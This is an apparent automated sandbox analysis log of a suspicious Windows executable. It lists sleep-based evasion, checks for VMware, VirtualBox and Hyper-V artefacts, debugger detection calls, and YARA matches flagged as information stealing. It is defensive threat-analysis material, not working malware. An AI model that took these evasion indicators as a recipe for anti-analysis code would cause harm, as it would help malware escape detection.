                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596559s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596169s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -596062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595952s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -594110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599516Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599118Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599014Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598896Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598776Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598563Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598016Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597094Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596559Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596438Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596313Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596169Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595952Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594110Jump to behavior
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmwaretrat
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q*C:\windows\System32\Drivers\vmmousever.dll
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vboxservice
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q)C:\windows\System32\Drivers\VBoxGuest.sys
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q+C:\windows\System32\Drivers\VMToolsHook.dll
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104408367.00000000006B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.Sern`
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q#C:\windows\System32\vboxservice.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmtoolsd
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'C:\windows\System32\Drivers\Vmmouse.sys
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q)C:\windows\System32\Drivers\VBoxMouse.sys
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmwareuser
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q&C:\windows\System32\Drivers\VBoxSF.sys
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_0-82556
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_061C9578 LdrInitializeThunk,0_2_061C9578
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: GetLocaleInfoA,0_2_00417A20
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
